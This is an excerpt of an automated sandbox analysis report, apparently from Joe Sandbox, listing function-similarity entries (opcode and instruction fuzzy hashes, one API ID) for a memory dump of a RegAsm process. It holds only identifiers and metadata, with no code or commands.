                          • API String ID:
                          • Opcode ID: 71f0d4da5a2352beb2b6c0ceaf9223eb13684035c4f0e4fb227e74c50769d2fa
                          • Instruction ID: e2922715faf7c44a3e0b717e72aaf9a004125947f3780c4651a19aee2f074842
                          • Opcode Fuzzy Hash: 71f0d4da5a2352beb2b6c0ceaf9223eb13684035c4f0e4fb227e74c50769d2fa
                          • Instruction Fuzzy Hash: 0BB1E872A04B804FD3158A38C8D53ABBFD2ABD9318F1D8A7DC5DB87387D67994098706
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 50a94d6d73b6983b78caec3925a5b7c191eb7eaf31cd319ae59d333546bd7c28
                          • Instruction ID: a10b34587ad77af6e4c1aeeca4f08b809cfbad60c63f1cc1086a8718c367298d
                          • Opcode Fuzzy Hash: 50a94d6d73b6983b78caec3925a5b7c191eb7eaf31cd319ae59d333546bd7c28
                          • Instruction Fuzzy Hash: 6C814C32A042615FC712CE28888079BBBD1AB95364F19C27ED8B98B3D2D675DC4BD3C1
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 927581d324afb18b2a02b58fefe90dce27eee103f4ab43400879cd86b6add9e2
                          • Instruction ID: b53451a0af14f8966e8f2fee35abc999af8fdd0b5a00149c6331512bc9f799b9
                          • Opcode Fuzzy Hash: 927581d324afb18b2a02b58fefe90dce27eee103f4ab43400879cd86b6add9e2
                          • Instruction Fuzzy Hash: A6A14A72608B804FD3158B38D4953ABBFE1AF96308F98887DC9CB47346D579A449C716
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 23980842b447fe10a91259d9c8b47e55dbd1e9b9be0b3422651121edf8911a80
                          • Instruction ID: 6de7fb94a5ff35423c8dd22adfe711f85252a9e5728d6fed225c5747c12ab5de
                          • Opcode Fuzzy Hash: 23980842b447fe10a91259d9c8b47e55dbd1e9b9be0b3422651121edf8911a80
                          • Instruction Fuzzy Hash: 98612D26B4DA915BC32C5E3C4C223B97A834B9A335F2D936FE5F24B3E1C64D4A024359
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: e0e7f29c9d4574c10ef8c86b6e3f345a40110ce0b8b630d1dd0d4f1f21e72020
                          • Instruction ID: 88eb34010b5fa47e1c25940ef64784a295cf2587a9aa0a2bbbb0f70812c1c5cb
                          • Opcode Fuzzy Hash: e0e7f29c9d4574c10ef8c86b6e3f345a40110ce0b8b630d1dd0d4f1f21e72020
                          • Instruction Fuzzy Hash: 505105357093804BE395D71BD88136B7683ABD4310F2ECC3DD289A73A5DB7A4C12475A
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true